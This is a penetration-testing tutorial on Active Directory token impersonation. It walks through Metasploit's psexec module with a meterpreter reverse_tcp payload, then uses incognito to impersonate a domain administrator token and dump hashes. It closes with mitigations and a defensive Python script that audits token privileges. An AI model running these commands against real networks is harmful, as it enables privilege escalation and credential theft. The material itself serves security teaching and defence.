Token Impersonation: AD Post Compromise Attack
Overview
What are tokens?
- Temporary keys that allow you to access a system/network without having to provide credentials each time you access a file. Think cookies for computers.
Two types:
- Delegate - created for interactive logons, such as logging into a machine or using Remote Desktop.
- Impersonate - created for “non-interactive” logons, such as attaching a network drive or running a domain logon script.
Steps:
- Pop a shell and load incognito
- Impersonate our domain user
- Attempt to dump hashes as non-Domain Admin
ALRIGHT, BUT WHAT IF A DOMAIN ADMIN TOKEN WAS AVAILABLE?
- Identify Domain Administrator
- Impersonate our Domain Administrator
- Attempt to dump hashes as Domain Admin…
WIN!
Token Impersonation with Incognito
To perform this attack, first we have to start up Metasploit.
Command: msfconsole
Now we will use the psexec module in Metasploit.
Command: use exploit/windows/smb/psexec
Now we will set the options for our attack:
set rhosts <target IP>
set smbdomain <domain>
set smbpass <password>
set smbuser <user>
Now we will type “show targets” and set the target to Native upload by typing “set target 2”. Then we will set the payload.
Command: set payload windows/x64/meterpreter/reverse_tcp
Now we will set lhost:
Command: set lhost eth0
Now we will type “run” and hit enter, and we get a meterpreter shell.
Now we will load Incognito.
Command: load incognito
Typing “help” lists the commands that Incognito adds to the session.
Now we will list the available user tokens:
Command: list_tokens -u
Here we can see the administrator token, so now we will impersonate it.
Command: impersonate_token marvel\\administrator
Now we will type “shell” and hit enter; we get a shell on that machine, and we are administrator now.
But here is a problem: if we exit the shell and run hashdump, it gives an error. To solve this, we run a command that drops the impersonated token and takes us back to the token we had when we first entered the machine.
Command: rev2self
Mitigation Strategies
- Limit user/group token creation permissions.
- Account tiering
- Local admin restriction
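One way to act on the first mitigation, checking which principals hold the token-related privileges on a host, as an added example that is not part of the original writeup: it parses the [Privilege Rights] section of a `secedit /export /cfg <file>` output and reports every holder beyond an assumed baseline. The sample export, the domain SIDs in it, and the baseline are constructed.

```python
# Constructed sample of the [Privilege Rights] section from a `secedit /export` file.
# Well-known SIDs: S-1-5-32-544 Administrators, S-1-5-6 SERVICE, S-1-5-19 LOCAL SERVICE,
# S-1-5-20 NETWORK SERVICE. The S-1-5-21-... entries are hypothetical domain principals.
SAMPLE_EXPORT = """[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
SeCreateTokenPrivilege = *S-1-5-21-1111-2222-3333-500
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
"""

# Token-related privileges and the principals normally expected to hold them.
# Assumed baseline for a workstation; adjust it to your own hardening standard.
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
    "SeCreateTokenPrivilege": set(),
}


def parse_privilege_rights(text):
    """Return {privilege: set of SIDs} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line == "[Privilege Rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, holders = line.partition("=")
        # secedit prefixes SIDs with '*'; strip it so SIDs compare cleanly.
        rights[name.strip()] = {h.strip().lstrip("*") for h in holders.split(",") if h.strip()}
    return rights


def find_excess_token_rights(text, baseline=BASELINE):
    """Return {privilege: sorted SIDs} for holders of a token privilege beyond the baseline."""
    rights = parse_privilege_rights(text)
    excess = {}
    for priv, allowed in baseline.items():
        extra = rights.get(priv, set()) - allowed
        if extra:
            excess[priv] = sorted(extra)
    return excess


if __name__ == "__main__":
    for priv, sids in find_excess_token_rights(SAMPLE_EXPORT).items():
        print(f"{priv}: unexpected holders {', '.join(sids)}")
```

Resolve the reported SIDs with Get-LocalUser/Get-ADObject and remove the right from anything that is not a service account that genuinely needs it.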
If you liked this writeup, you can connect with me on LinkedIn or Instagram.